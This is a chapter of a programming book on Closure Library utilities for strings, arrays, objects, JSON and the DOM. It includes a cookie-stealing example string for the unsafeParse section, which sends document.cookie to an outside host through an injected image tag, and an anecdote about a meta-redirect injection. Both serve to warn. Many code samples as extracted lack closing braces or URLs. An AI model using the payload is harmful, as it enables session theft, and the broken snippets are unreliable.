Chapter 4. Common Utilities

The Closure Library contains utilities for many common tasks, but as is often the case when encountering a new library, the problem is finding the functionality that you need. This chapter introduces the most commonly used utilities in the Library, which should serve as a good starting point. It also provides some insight into how the Library is organized, which should help when searching for functionality that is not covered in this chapter.

Each file in the Closure Library defines one or more namespaces. Generally, a namespace either is a host for a collection of related functions or identifies a constructor function for a new class. This chapter focuses on the former: it will introduce many of the most commonly used “function namespaces” from the Library and discuss a handful of functions from each. The following chapter will focus on the latter: it will explain how constructor functions and object prototypes are used to represent classes and inheritance in Closure.

Unlike the previous chapter, which explained every member of the goog namespace in detail, this is not meant to be a comprehensive reference for each namespace. Instead, this chapter will discuss only a handful of functions from the libraries most commonly used in Closure. Each function that was chosen has nuances which will be explained. Some of these subtleties result from the use of a Closure-specific design pattern, so it is recommended that this chapter be read in its entirety to gain a better understanding of the design principles behind the Closure Library outlined in Chapter 1.

For the other functions in each namespace that are not discussed in this chapter, the JSDoc descriptions in the source code are generally sufficient. The HTML documentation generated from the JSDoc can be browsed online at

Here is a brief description of each namespace discussed in this chapter:

  • goog.string contains functions for dealing with strings, particularly string escaping.

  • goog.array contains functions for modifying arrays and for acting on array elements.

  • goog.object contains functions for working with key-value pairs that are universal to all JavaScript objects.

  • goog.json contains functions for parsing and serializing JSON.

  • goog.dom contains functions for accessing and manipulating DOM elements.

  • goog.dom.classes contains functions for manipulating CSS classes on DOM elements.

  • goog.userAgent contains functions for doing user agent detection.

  • goog.userAgent.product contains functions for doing browser detection.

  • contains functions for working with browser cookies.

  • contains functions for reading and setting CSS styles on DOM elements.

  • goog.functions contains functions for building functions without using the function keyword.

Finding the file in the Closure Library that defines a namespace is fairly straightforward. Like the relationship between packages and directory structures in Java, a Closure namespace mirrors its path in the repository. For example, the goog.userAgent.product namespace is defined in closure/goog/useragent/product.js. Though sometimes the rightmost part of the namespace may match both the file and the directory, as the goog.string namespace is defined in closure/goog/string/string.js. This is because there are additional string-related utilities in the closure/goog/string directory (stringbuffer.js and stringformat.js), but the most commonly used functionality regarding strings is defined in string.js. Because of this slight inconsistency, some hunting may be required to find the file that defines a namespace, though running the following command from the root of the Closure Library directory in either the Mac or Linux terminal can help find the file directly:

$ find closure -name '*.js' | xargs grep -l "goog.provide('goog.string')"
# The above command returns only the following result:

This is one of the many cases in which the consistent use of single quotes for string literals makes it easier to do searches across the Library codebase.


goog.string contains many functions for dealing with strings. As explained in Chapter 1, Closure does not modify function prototypes, such as String, so functions that would be methods of String in other programming languages are defined on goog.string rather than on String.prototype. For example, goog.string.startsWith() is a function that takes a string and prefix and returns true if the string starts with the specified prefix. It could be added as a method of String by modifying its prototype:

String.prototype.startsWith = function(prefix) {
  return goog.string.startsWith(this, prefix);

This would make it possible to rewrite goog.string('foobar', 'foo') as 'foobar'.startsWith('foo'), which would be more familiar to Java programmers. However, if Closure were loaded in a top-level frame and operated on strings created in child frames, those strings would have a String.prototype different from the one modified by Closure in the top-level frame. That means that the strings created in the top-level frame would have a startsWith() method, and those created in child frames would not. This would be a nightmare for client code to deal with; using pure functions rather than modifying the prototype avoids this issue.

goog.string.htmlEscape(str, opt_isLikelyToContainHtmlChars)

Offering a function to escape a string of HTML is fairly common in a JavaScript library, yet Closure’s implementation is worth highlighting. Most importantly, escaping strings of HTML can prevent security vulnerabilities and save your website considerable bad press. Note that the solution is not to liberally sprinkle goog.string.htmlEscape() throughout your code—that may prevent security vulnerabilities, but it may also result in displaying doubly escaped text, which is also embarrassing. The first argument to goog.string.htmlEscape() should be a string of text, not a string of HTML. Unfortunately, there is not yet a type expression to use to discriminate between text and HTML: both arguments are simply annotated as string types. The description of a string parameter should always specify whether its content is text or HTML if it is ambiguous.


I once came across a poorly implemented message board that did not escape HTML. I started a new discussion topic whose title contained a <meta redirect> tag that sent users to my own website. All subsequent visitors to the message board were redirected (apparently the meta tag still took effect even though it appeared in the <body> rather than the <head> of the page). I did this the day after the site went live, creating considerable embarrassment for the developers. The company pointed the finger at me and called me a hacker, but I had as much sympathy for them as the mother of xkcd’s Little Bobby Tables.

image with no caption

“Exploits of a Mom,” reprinted with permission of Randall Munroe (

The implementation of Closure’s HTML escaping function is particularly interesting in that it introduces additional logic to limit the number of regular expressions it uses when escaping a string. This sensitivity to performance is merited because (as explained in Chapter 11) the JavaScript produced by a Closure Template relies heavily on this function. It is likely to be called often, frequently in loops, so it is important that it be fast.

The implementation assumes that goog.string.htmlEscape() will frequently be called with an argument that does not need to be escaped at all. It runs one regular expression to determine whether the string has any escapable characters. If not, the string is returned immediately. Otherwise, indexOf() is used to test for the existence of each escapable character (&, <, >, and "), and for each one it finds, a regular expression is run to do the replacement for the character found. The first regular expression test and subsequent indexOf() tests are omitted if opt_isLikelyToContainHtmlChars is set to true. In that case, the four regular expressions for the escapable characters are run indiscriminately.

A similar trick is used in goog.string.urlEncode(). Read the comments in its implementation for details.

It is also important to note that a double quote is escaped by goog.string.htmlEscape() but a single quote is not. As the JSDoc for the function states, goog.string.htmlEscape() will “Escape double quote '"' characters in addition to '&', '<', and '>' so that a string can be included in an HTML tag attribute value within double quotes.” That means that the result of goog.string.htmlEscape() may not be suitable as an attribute value within single quotes:

var attr = 'font-family: O\'Reilly;';
var html = '<span style=\'' + goog.string.htmlEscape(attr) + '\'>';
// html is <span style='font-family: O'Reilly'> which could be parsed as
// <span style='font-family: O'> by the browser

To avoid this error, prefer double quotes for HTML attributes over single quotes. This tends to work well in Closure where single quotes are preferred for string literals, so the double quotes used within them do not need to be escaped.


It is common to take a query string from a user and use it as the basis for a regular expression to perform a search. Using such a string verbatim leads to the following common programming error:

var doSearch = function(query) {
  var matcher = new RegExp(query);
  var strings = ['', 'gorge'];
  var matches = [];
  for (var i = 0; i < strings.length; i++) {
    if (matcher.test(strings[i])) {
  return matches;

doSearch('.org'); // returns both '' and 'gorge'

Recall that the dot in a regular expression matches any character, so /.org/ will match a string that contains any character followed by 'org', which includes strings such as 'gorge' and 'borg'. Oftentimes, this does not meet the user’s expectation who only wanted matches that contain '.org', not all of those that contain 'org'. The dot is only one of the approximately 20 characters that have a special meaning in the context of a regular expression.

The previous problem can be solved by using goog.string.regExpEscape(), which escapes str by preceding each special character with a backslash. Escaping characters in this manner causes the matching engine to match the literal character rather than using its special meaning in the context of a regular expression. The example can be fixed by adding the following as the first line of doSearch:

query = goog.string.regExpEscape(query);

This will create a RegExp with the value /\.org/. Further, because query will not contain any metacharacters after it is escaped, it can be used to build a new regular expression that matches strings that start or end with the user’s query:

var doSearch = function(query, mustStartWith, mustEndWith) {
  query = goog.string.regExpEscape(query);
  if (mustStartWith) {
    query = '^' + query;
  if (mustEndWith) {
    query = query + '$';
  var matcher = new RegExp(query);
  var strings = ['', ''];
  var matches = [];
  for (var i = 0; i < strings.length; i++) {
    if (matcher.test(strings[i])) {
  return matches;

doSearch('.org', false, true); // returns but not

goog.string.whitespaceEscape(str, opt_xml)

When ordinary text is displayed as HTML, whitespace characters such as newlines are collapsed and treated as a single space character unless the text is the content of a <pre> element (or an element with CSS styles to preserve whitespace). Alternatively, goog.string.whitespaceEscape() can be used to produce a new version of str in which sequences of two space characters are replaced with a non-breaking space and newlines are replaced with <br> tags. (If opt_xml is true, then <br /> will be used instead.) This produces a version of str that can be inserted into HTML such that its spatial formatting will be preserved. If this is to be used in conjunction with goog.string.escapeHtml(), then str should be HTML-escaped before it is whitespace-escaped.

goog.string.compareVersions(version1, version2)

Version numbers for software do not obey the laws of decimal numbers, so goog.string.compareVersions contains special logic to compare two version numbers. The first strange property of version numbers is that they are not numbers, but strings. Although they may often appear to be numbers, they often contain more than one dot and may also contain letters. For example, "1.9.2b1" is the version number of Mozilla used with the first beta of Firefox 3.6 whose own version number is "3.6b1". The second strange property of version numbers is that they can defy the mathematics you learned in grade school because in version numbers, 3.2 is considered “less than” 3.12. This is because the dot is not a decimal place but a separator, and the digits between each separator compose their own decimal value rather than a fraction of the previous value. That means that updates to a 3.0 release will be 3.1, 3.2, 3.3,…3.8, 3.9, 3.10, 3.11, 3.12, etc. In this way, version 3.2 was released before version 3.12, which is why 3.2 is “less than” 3.12.

Like most comparison functions in JavaScript, if version1 is less than version2, then goog.string.compareVersions returns -1, if they are the same it returns 0, and if version1 is greater than version2 it returns 1. In Closure, this is most commonly used when comparing the version numbers for user agents. Some examples:

// goog.string.compareVersions takes numbers in addition to strings.
goog.string.compareVersions(522, 523); // evaluates to -1

// Here the extra zero is not significant.
goog.string.compareVersions('3.0', '3.00'); // evaluates to 0

// Because letters often indicate beta versions that are released before the
// final release, 3.6b1 is considered "less than" 3.6.
goog.string.compareVersions('3.6', '3.6b1'); // evaluates to 1


The goog.string.hashCode(str) function behaves like hashCode() in Java. The hash code is computed as a function of the content of str, so strings that are equivalent by == will have the same hash code.

Because string is an immutable type in JavaScript, a string’s hash code will never change. However, its value is not cached, so goog.string.hashCode(str) will always recompute the hash code of str. Because goog.string.hashCode is O(n) in the length of the string, using it could become costly if the hash codes of long strings are frequently recomputed.


Like goog.string, goog.array defines a number of functions for dealing with arrays rather than modifying Array.prototype. This is even more important in the case of goog.array because many functions in goog.array do not operate on objects of type Array: they operate on objects of the ad-hoc type goog.array.ArrayLike. Because goog.array.ArrayLike is an ad-hoc type, it has no corresponding prototype to which array methods could be added. This design makes it possible to use common array methods such as indexOf() and filter() on Array-like objects such as NodeList and Arguments.

Note that some functions in goog.array take only an Array as an argument rather than goog.array.ArrayLike. This is because not all ArrayLike types are mutable, so functions such as sort(), extend(), and binaryInsert() restrict themselves to operating on Arrays. However, such functions can be applied to a copy of an ArrayLike object:

// images is a NodeList, so it is ArrayLike.
var images = document.getElementsByTagName('IMG');

// goog.array.toArray() takes an ArrayLike and returns a new Array.
var imagesArray = goog.array.toArray(images);

// goog.array.sort() can be applied to imagesArray but not images.
goog.array.sort(imagesArray, function(a, b) {
  return goog.string.caseInsensitiveCompare(a.src, b.src);

In Firefox 1.5, Mozilla introduced built-in support for a number of new array methods: indexOf(), lastIndexOf(), every(), filter(), forEach(), map(), and some(). Each of these exists as a corresponding function in goog.array with the same function signature. When Closure detects a native implementation for one of these methods, it uses it; otherwise, the Library supplies its own implementation. Note that each of these methods was standardized in ES5, and the Closure Library implementation is 100% compatible with the ES5 spec.

goog.array.forEach(arr, func, opt_obj)

goog.array.forEach() applies the function func to every element in arr, using opt_obj for this in func, if specified. Each time func is called, it receives three arguments: the element, the element’s index, and the array itself. When coming from another programming language that has more elegant support for iterating over the elements in an array, it may be tempting to start replacing all for loops with goog.array.forEach(); however, this has performance implications that need to be considered. Compare the code for both approaches:

// Traditional for loop.
var total = 0;
for (var i = 0; i < positions.length; i++) {
  var position = positions[i];
  total += position.getPrice() * position.getNumberOfShares();
  log('Added item ' + (i + 1) + ' of ' + positions.length);

// goog.array.forEach().
var total = 0;
goog.array.forEach(positions, function(position, index, arr) {
  total += position.getPrice() * position.getNumberOfShares();
  log('Added item ' + (index + 1) + ' of ' + arr.length);

Certainly the goog.array.forEach() example is fewer bytes to type and to read, but aggressive compilation will minimize that difference. Although the difference in compiled code size is likely negligible, the additional runtime cost of goog.array.forEach() is worth considering.

In goog.array.forEach(), an extra function object is created which is called O(n) times. When evaluating the line of code that updates total, there is an extra level of depth in the scope chain that needs to be considered. Therefore, the cost of using goog.array.forEach() in place of a regular for loop depends on the size of the input and the number of non-local variables used in the anonymous function. According to High Performance JavaScript by Nicholas C. Zakas (O’Reilly), the cost of writing a variable that is two levels deep in the scope chain is 1.5–2 times slower than writing a variable that is only one level deep (i.e., a local variable) on Firefox 3.5, Internet Explorer 8, and Safari 3.2. In Internet Explorer 6 and Firefox 2, the penalty is significantly worse (their results are so bad that they do not fit in Zakas’s graph). Fortunately, Opera 9.64, Chrome 2, and Safari 4 do not appear to have a measurable performance difference when writing variables at different depths in the scope chain.

Therefore, when writing JavaScript that is going to be run on older browsers, it is important to pay attention to these costs. For example, Gmail is such a massive JavaScript application that it has to serve a reduced version of its JavaScript to older versions of IE in an attempt to operate within its memory constraints: Fortunately most web apps are not as large as Gmail and do not need to be concerned with such micro-optimizations. However, those that do should also be aware that these performance implications also hold for the other iterative members of goog.array that take a function that could get applied to every element in the array: every(), filter(), find(), findIndex(), findIndexRight(), findRight(), forEach(), forEachRight(), map(), reduce(), reduceRight(), removeIf(), and some().

But each of these functions abstracts away some additional boilerplate, which may be tedious and error-prone to reimplement. The optimal solution would be to use the goog.array functions, and if it turns out that one of them is responsible for a performance bottleneck, add custom logic to the Compiler to rewrite the offending calls as inline loops. That is the Closure way.

Using Iterative goog.array Functions in a Method

Although methods will not be introduced until Chapter 5, it is worth pointing out a common mistake when replacing traditional for loops with goog.array.forEach() inside a method body. (This also applies when using the other iterative members of goog.array, such as every(), filter(), etc.) Consider a traditional for loop whose method body refers to this:

Portfolio.prototype.getValue = function() {
  var total = 0;
  for (var i = 0; i < positions.length; i++) {
    total += this.getValueForPosition(position);
  return total;

If it is rewritten as follows, this will refer to the global object when the function is called, which will produce an error as getValueForPosition() is not defined on the global object:

Portfolio.prototype.getValue = function() {
  var total = 0;
  goog.array.forEach(positions, function(position) {
    total += this.getValueForPosition(position);
  return total;

Fortunately, there is a simple solution, which is to use this as the value for opt_obj:

Portfolio.prototype.getValue = function() {
  var total = 0;
  goog.array.forEach(positions, function(position) {
    total += this.getValueForPosition(position);
  }, this);
  return total;

This preserves the behavior of the original for loop.


goog.object is a collection of functions for dealing with JavaScript objects. Like goog.array, it has various utilities for iterating over an object’s elements (either its keys or its values) and applying a function to all items in the iteration. Examples include every(), filter(), forEach(), map(), and some(). This section will explore some functions that do not have a corresponding implementation in goog.array.

goog.object.get(obj, key, opt_value)

goog.object.get() returns the value associated with key on obj if it has key as a property in its prototype chain; otherwise, it returns opt_value (which defaults to undefined). Note that opt_value will not be returned if key maps to a value that is false in a boolean context—it is only returned if there is no such key:

// A map of first to last names (if available).
var names = { 'Elton': 'John', 'Madonna': undefined };

// Evaluates to 'John' because that is what 'Elton' maps to in names.
goog.object.get(names, 'Elton', 'Dwight');

// Evaluates to undefined because that is what 'Madonna' maps to in names.
goog.object.get(names, 'Madonna', 'Ciccone');

// Evaluates to the optional value 'Bullock' because 'Anna' is not a key
// in names.
goog.object.get(names, 'Anna', 'Bullock');

// Evaluates to the built-in toString function because every object has a
// property named toString.
goog.object.get(names, 'toString', 'Who?');

goog.setIfUndefined(obj, key, value)

goog.setIfUndefined() creates a property on obj using key and value if key is not already a key for obj. Like goog.object.get(), goog.setIfUndefined() also has curious behavior if obj has already has key as a property, but whose value is undefined:

var chessboard = { 'a1': 'white_knight', 'a2': 'white_pawn', 'a3': undefined };

// Try to move the pawn from a2 to a3.
goog.object.setIfUndefined(chessboard, 'a3', 'white_pawn');
if (chessboard['a3'] != 'white_pawn') {
  throw Error('Did not move pawn to a3');

In the previous example, an error is thrown because goog.object.setIfUndefined does not modify chessboard because it already has a property named a3. To use goog.object.setIfUndefined with this abstraction, properties must be assigned only for occupied squares:

// Do not add a key for 'a3' because it does not have a piece on it.
var chessboard = { 'a1': 'white_knight', 'a2': 'white_pawn' };

// Now this will set 'a3' to 'white_pawn'.
goog.object.setIfUndefined(chessboard, 'a3', 'white_pawn');

// This will free up 'a2' so other pieces can move there.
delete chessboard['a2'];


goog.object.transpose() returns a new object with the mapping from keys to values on obj inverted. In the simplest case where the values of obj are unique strings, the behavior is straightforward:

var englishToSpanish = { 'door': 'puerta', 'house': 'casa', 'car': 'coche' };
var spanishToEnglish = goog.object.transpose(englishToSpanish);
// spanishToEnglish is { 'puerta': 'door', 'case': 'house', 'coche': 'car' }

If obj has duplicate values, then the result of goog.object.transpose can vary depending on the environment. For example, because most browsers will iterate the properties of an object literal in the order in which they are defined and because goog.object.transpose assigns mappings using iteration order, most browsers would produce the following:

var englishToSpanish1 = { 'door': 'puerta', 'goal': 'puerta' };
var spanishToEnglish1 = goog.object.transpose(englishToSpanish1);
// spanishToEnglish1 is { 'puerta': 'goal' }

var englishToSpanish2 = { 'goal': 'puerta', 'door': 'puerta' };
var spanishToEnglish2 = goog.object.transpose(englishToSpanish2);
// spanishToEnglish2 is { 'puerta': 'door' }

In each case, it is the last mapping listed in the object literal that appears in the result of goog.object.transpose. This is because mappings that appear later in the iteration will overwrite mappings added earlier in the iteration if their keys (which were originally values) are the same.

When obj is a one-to-one mapping of strings to strings, the behavior of goog.object.transpose is straightforward; however, if obj has duplicate values or values that are not strings, then the result of goog.object.transpose may be unexpected. Consider the following example:

var hodgePodge = {
  'obj_literal': { toString: function() { return 'Infinity' } },
  'crazy': true,
  'now': new Date(),
  'error': 1 / 0,
  'modulus': 16 % 2 == 0,
  'unset': null

var result = goog.object.transpose(hodgePodge);
// result will look something like:
// { 'Infinity': 'error',
//   'true': 'modulus',
//   'Tue Dec 08 2009 09:46:19 GMT-0500 (EST)': 'now',
//   'null': 'unset'
//   };

Recall that objects in JavaScript are dictionaries where keys must be strings but values can be anything. Each value in hodgePodge is coerced to a string via the String() function. For objects with a toString() method, such as { toString; function() { return 'Infinity'; } } and new Date(), the result of toString() will be its key in the result of goog.object.transpose. When String() is applied to primitive values such as true, null, and Infinity, the result is their respective names: "true", "null", and "Infinity". In hodgePodge, both "obj_literal" and "error" are mapped to values that are coerced to the string "Infinity". Similarly, both "crazy" and "modulus" are mapped to values that are coerced to the string "true". Because of these collisions, result has only four mappings, whereas hodgePodge has six.


goog.json provides basic utilities for parsing and serializing JSON. Currently, Closure’s API is not as sophisticated as the API for the JSON object specified in the fifth edition of ECMAScript Language Specification (ES5), but now that browser vendors have started to implement ES5, Closure is planning to expand its API to match it.


From its name, goog.json.parse() sounds like the right function to use to parse a string of JSON, though in practice, that is rarely the case (as it is implemented today). Currently, goog.json.parse() runs a complex regular expression on str to ensure that it is well formed before it tries to parse it. As noted in the documentation: “this is very slow on large strings. If you trust the source of the string then you should use unsafeParse instead.” goog.json.parse() aims to maintain the behavior of JSON.parse(), in which values of str that do not conform to the JSON specification are rejected.

Most web applications use JSON as the format for serializing data because it can be parsed quickly in a browser by using eval(). Assuming the server takes responsibility for sending well formed JSON to the client, the JSON should be able to be parsed on the client without running the expensive regular expression first. To achieve the best performance, parse only JSON that can be trusted to be well-formed and use goog.json.unsafeParse() which will call eval() without doing the regular expression check first.

At the time of this writing, unlike JSON.parse(), as specified in ES5, goog.json.parse() does not support an optional reviver argument.


goog.json.unsafeParse() parses a string of JSON and returns the result. As explained in the previous section, its implementation is very simple because it uses eval():

goog.json.unsafeParse = function(str) {
  return eval('(' + str + ')');

This could be unsafe if str is not JSON but a malicious string of JavaScript, such as:

var str = 'new function() {' +
    'document.body.innerHTML = ' +
    '\'<img src="\' + ' +
    'encodeURIComponent(document.cookie) + ' +
    '\'">\';' +

// This would send the user's cookie to

// By comparison, this would throw an error without sending the cookie.

Because of the security issues introduced by goog.json.unsafeParse, it should be used only when it is safe to assume that str is valid JSON.


goog.json.serialize() takes an object (or value) and returns its JSON string representation. Its behavior is identical to JSON.stringify except that it does not serialize an object using its toJSON() method if it has one. Consider the following example:

var athlete = {
  'first_name': 'Michael',
  'cereal': 'Wheaties',
  'toJSON': function() { return 'MJ' }

// Evaluates to: '{"first_name":"Michael","cereal":"Wheaties"}'
// toJSON, like all other properties whose values are functions, is ignored.

// Evaluates to: 'MJ'
// Because athlete has a toJSON method, JSON.stringify calls it and uses its
// result instead of serializing the properties of athlete. 

At the time of this writing, unlike JSON.stringify(), as specified in ES5, goog.json.serialize() does not support the optional replacer or space arguments.


goog.dom is a collection of utilities for working with DOM nodes. Many functions in the goog.dom namespace need to operate in the context of a Document, so goog.dom uses window.document when the need arises. Most web applications execute their JavaScript in the same frame as the DOM they manipulate, so window.document works as a default for those applications. But when multiple frames are used, a goog.dom.DomHelper should be used instead. goog.dom.DomHelper has nearly the same API as goog.dom, but its Document is set by the user rather than assuming the use of window.document. Using goog.dom.DomHelper makes the context of DOM operations explicit. Its importance will be explained in more detail in Chapter 8.


Getting an element by its id is perhaps the most common operation performed on the DOM, so it is unfortunate that the built-in mechanism for doing so requires so much typing:

// Native browser call.
var el = document.getElementById('header');

Because of this, most JavaScript libraries have a wrapper function for the native call with a shorter name:

// Aliases for document.getElementById() in popular JavaScript libraries:
var el = goog.dom.getElement('header');     // Closure
var el = goog.dom.$('header');              // alias for goog.dom.getElement()
var el = dojo.byId('header');               // Dojo
var el = $('header');                       // Prototype, MooTools, and jQuery

As usual, Closure does not win first place for having the shortest function name, but after compilation, it will not make a difference. Like the other libraries listed previously, Closure’s goog.dom.getElement function accepts either a string id or an Element object. In the case of the former, it looks up the element by id and returns it; in the case of the latter, it simply returns the Element.

goog.dom.getElement() and goog.dom.$() are references to the same function. Because the Closure Library was designed with the Compiler in mind, it does not engage in the practice of other JavaScript libraries that try to save bytes by using abbreviated function names. (Using more descriptive names is more to type, but also makes the code more readable.) Nevertheless, the use of $ as an alias for document.getElementById is so prevalent in other libraries that goog.dom.$() is supported because it is familiar to JavaScript developers. However, if you choose to take this shortcut, be aware that goog.dom.$() is marked deprecated, so using it will yield a warning from the Compiler if you have deprecation warnings turned on.

goog.dom.getElementsByTagNameAndClass(nodeName, className, elementToLookIn)

It is common to add a CSS class to an element as a label so that it can be used as an identifier when calling goog.dom.getElementsByTagNameAndClass. When such a class has no style information associated with it, it is often referred to as a marker class. Although the id attribute is the principal identifier for an element, ids are meant to be distinct, so it is not possible to label a group of elements with the same id. In this way, CSS classes can act as identifiers in addition to being directives for applying CSS styles.

Each argument to goog.dom.getElementsByTagNameAndClass() is optional. When no arguments are specified, all elements in the DOM will be returned. If only the first argument is specified, goog.dom.getElementsByTagNameAndClass() will behave like the built-in document.getElementsByTagName(), which returns all elements in the document with the specified node name. The nodeName argument is case-insensitive.

// To select all elements, supply no arguments or use '*' as the first argument.
var allElements = goog.dom.getElementsByTagNameAndClass('*');

// allDivElements is an Array-like object that contains every DIV in the document.
var allDivElements = goog.dom.getElementsByTagNameAndClass('div');

// The previous statement is equivalent to:
var allDivElements = goog.dom.getElementsByTagNameAndClass('DIV');

When className is specified, it restricts the list of elements returned to those which contain className as one of its CSS classes. The className argument cannot be a string with a space, such as "row first-row" to indicate that only elements with both row and first-row as CSS classes should be returned.

// All elements with the 'keyword' class.
var keywords = goog.dom.getElementsByTagNameAndClass(undefined, 'keyword');

// All SPAN elements with the 'keyword' class.
var keywordSpans = goog.dom.getElementsByTagNameAndClass('span', 'keyword');

// This is an empty NodeList. Because CSS class names cannot contain spaces, it is
// not possible for there to be any elements with the class 'footer copyright'.
var none = goog.dom.getElementsByTagNameAndClass('span', 'footer copyright');

The third argument is the node to search when retrieving elements that have the specified node and class names. By default, document will be used for elementToLookIn so that all elements in the DOM will be considered. Specifying elementToLookIn can restrict the scope of the search and thereby improve performance:

// If the HTML for the DOM were as follows:
// <html>
// <head></head>
// <body>
//   <p id="abstract">
//     A specification by <a href=""></a>.
//   </p>
//   <p id="status">
//     No progress made as is not a real commercial entity.
//     See <a href="">RFC 2606</a>.
//   </p>
// </body>
// </html>

// Evaluates to a list with the two anchor elements.
goog.dom.getElementsByTagNameAndClass('a', undefined);

// Evaluates to a list with only the anchor element pointing to
// Only the child nodes of the first paragraph tag are traversed.
goog.dom.getElementsByTagNameAndClass('a', undefined,

The W3C has a draft specification for a Selectors API that would enable developers to use CSS selectors to retrieve Element nodes from the DOM. This would allow for complex queries, such as "#score>tbody>tr>td:nth-of-type(2)". Even though the draft has not been finalized, some browsers have gone ahead and implemented the querySelector() and querySelectorAll() methods defined in the specification. These implementations are considerably faster, so Closure uses them when available in its implementation of goog.dom.getElementsByTagNameAndClass().

For browsers that do not implement the querySelector methods natively, the Closure Library has a pure JavaScript implementation of querySelectorAll() available as goog.dom.query(). The implementation is ported from the Dojo Toolkit and is more than 1500 lines long (including comments, of which there are many). Because it is so large, it is defined separately from the rest of goog.dom and has to be included explicitly via goog.require('goog.dom.query') if it is to be used. (This is an anomaly in Closure: goog.require() is generally used to include an existing namespace rather than to declare an additional function in an existing namespace.) None of the Closure Library depends on goog.dom.query(). In addition to the significant code dependency it would introduce, using it would incur many DOM accesses, which are known to be slow. (Again, see High Performance JavaScript for details on the costs of accessing the DOM.)

Like goog.dom.$() and goog.dom.getElement, goog.dom.$$() is an alias for goog.dom.getElementsByTagNameAndClass(). Also like goog.dom.$(), goog.dom.$$() is marked deprecated.

goog.dom.getAncestorByTagNameAndClass(element, tag, className)

Whereas goog.dom.getElementsByTagName() searches the descendants of an element, goog.dom.getAncestorByTagNameAndClass() searches the ancestors of an element (including the element itself). This is useful when trying to determine the structure to which an element belongs, which is a common problem when dealing with mouse events on a repeated DOM structure. For example, consider the following table of information composed of <div>, <span>, and <img> elements:

<style>.favicon { width: 16px; height: 16px }</style>

<div id="root">
  <div id="row-amazon" class="row">
    <img src="" class="favicon">
  <div id="row-apple" class="row">
    <img src="" class="favicon">
  <div id="row-google" class="row">
    <img src="" class="favicon">
  <div id="row-yahoo" class="row">
    <img src="" class="favicon">

To determine when an individual row is highlighted or clicked, one option would be to add the appropriate listeners for each row; however, if new rows are added and removed from this table, then the bookkeeping required to add and remove the appropriate listeners will be tedious. A simpler approach is to add an individual mouse listener to the root of the DOM tree, and then use goog.dom.getAncestorByTagNameAndClass() to determine the row on which the event occurred. The following example shows how this technique can be used to highlight the row that is moused over and to alert the row that is clicked:



/** @type {?Element} */
var highlightedRow = null; = function(e) {
  var el = /** @type {!Element} */ (;
  var rowEl = goog.dom.getAncestorByTagNameAndClass(
      el, undefined /* opt_tag */, 'row');
  var name ='row-'.length);
  alert('clicked on: ' + name);

example.mouseover = function(e) {
  var el = /** @type {!Element} */ (;
  var rowEl = goog.dom.getAncestorByTagNameAndClass(
      el, undefined /* opt_tag */, 'row');
  if (rowEl === highlightedRow) {
  highlightedRow = rowEl; = 'gray';

example.clearHighlight = function() {
  if (highlightedRow) { = 'white';
  highlightedRow = null;  

example.main = function() {
  var root = goog.dom.getElement('root');
  // Most modern browsers support addEventListener(), though versions of
  // Internet Explorer prior to version 9 do not. A superior mechanism for
  // registering event listeners is introduced in Chapter 6.

                        false /* capture */);
                        false /* capture */);
                        false /* capture */);

In this example, row is used as a marker class to facilitate the use of goog.dom.getAncestorByTagNameAndClass().

goog.dom.createDom(nodeName, attributes, var_args)

goog.dom.createDom creates a new Element with the specified node name, attributes, and child nodes. Using Closure Templates to build up a string of HTML and assigning it as the innerHTML of an existing Element is generally the most efficient way to build up a DOM subtree, but for projects that are not using Templates, this is the next best option. (Note that to maintain the Library’s independence from Templates, the Library uses goog.dom.createDom heavily.) When building up small subtrees, the performance difference should be negligible.

The nodeName identifies the type of element to create:

// Creates a <span> element with no children
var span = goog.dom.createDom('span');

The second argument, attributes, is optional. If attributes is an object, then the properties of the object will be used as the key-value pairs for the attributes of the created element. If attributes is a string, goog.dom.createDom uses the string as the CSS class to add to the element and adds no other attributes:

// Example of creating a new element with multiple attributes.
// This creates an element equivalent to the following HTML:
// <span id="section-1" class="section-heading first-heading"></span>
var span = goog.dom.createDom('span', {
    'id': 'section-1'
    'class': 'section-heading first-heading',

// Example of creating a new element with only the CSS class specified.
// Creates an element equivalent to the following HTML:
// <span class="section-heading first-heading"></span>
var span = goog.dom.createDom('span', 'section-heading first-heading');

Although "class" is used as the key in the attributes object in the example, "className" will also work. The keys in the attributes object can be either attribute names or the scriptable property names for Elements that correspond to such attributes, such as "cssText", "className", and "htmlFor". See the implementation of goog.dom.setProperties for more details.

If specified, the remaining arguments to goog.dom.createDom represent the child nodes of the new element being created. Each child argument must be either a Node, a string (which will be interpreted as a text node), a NodeList, or an array that contains only Nodes and strings. These child nodes will be added to the element in the order in which they are provided to goog.dom.createDom. Because goog.dom.createDom returns an Element, which is a type of Node, calls can be built up to create larger DOM structures:

// Example of specifying child nodes with goog.dom.createDom.
// This creates an element equivalent to the following HTML:
// <div class="header"><img class="logo" src="logo.png"><h2>Welcome</h2></div>
goog.dom.createDom('div', 'header',
    goog.dom.createDom('img', {'class': 'logo', 'src': 'logo.png'}),
    goog.dom.createDom('h2', undefined, 'Welcome'));

// Example of using a NodeList to specify child nodes.
// This will find all IMG elements in the page and reparent them under
// the newly created DIV element.
goog.dom.createDom('div', undefined, goog.dom.getElementsByTagNameAndClass('img'));

The result of goog.dom.createDom can be added to the DOM by using goog.dom.appendChild(parent, child). The behavior of Closure’s appendChild function is no different than that of the appendChild method built into DOM Elements, but Closure’s function can be renamed by the Compiler, whereas the built-in one cannot. Similarly, functions such as goog.dom.createElement and goog.dom.createTextNode are wrappers for the methods of document with the same name for the benefit of Compiler renaming.

Note that strings passed as child nodes are always treated as text, which means they will be HTML-escaped:

// Example of text that is escaped so it is not interpreted as HTML.
// This call creates an element equivalent to the following HTML:
// <span>Will this be &lt;b&gt;bold&lt;/b&gt;?</span>
// NOT this HTML:
// <span>Will this be <b>bold</b>?</span>
goog.dom.createDom('span', undefined, 'Will this be <b>bold</b>?');

Like goog.dom.$ and goog.dom.getElement, goog.dom.$dom is an alias for goog.dom.createDom.


According to the specification, a DocumentFragment is a “minimal document object that has no parent.” It is generally used to represent a set of nodes that would normally be considered siblings. The following snippet of HTML represents four nodes, three of which are siblings:

Only <b>you</b> can prevent forest fires.
  1. A text node whose value is "Only ".

  2. An element whose name is "B".

  3. A text node whose value is "you". This is a child node of the B element.

  4. A text node whose value is " can prevent forest fires.".

Although the example HTML cannot be represented by a single Element, it can be represented by a DocumentFragment. In Closure, the DocumentFragment can be created as follows:

var smokeyTheBearSays = goog.dom.htmlToDocumentFragment(
    'Only <b>you</b> can prevent forest fires.');

Because a DocumentFragment is a type of Node, it can be used as an argument wherever a Node is accepted. Because of this, the words of Smokey the Bear could be emphasized as follows:

// This creates an element equivalent to the following HTML:
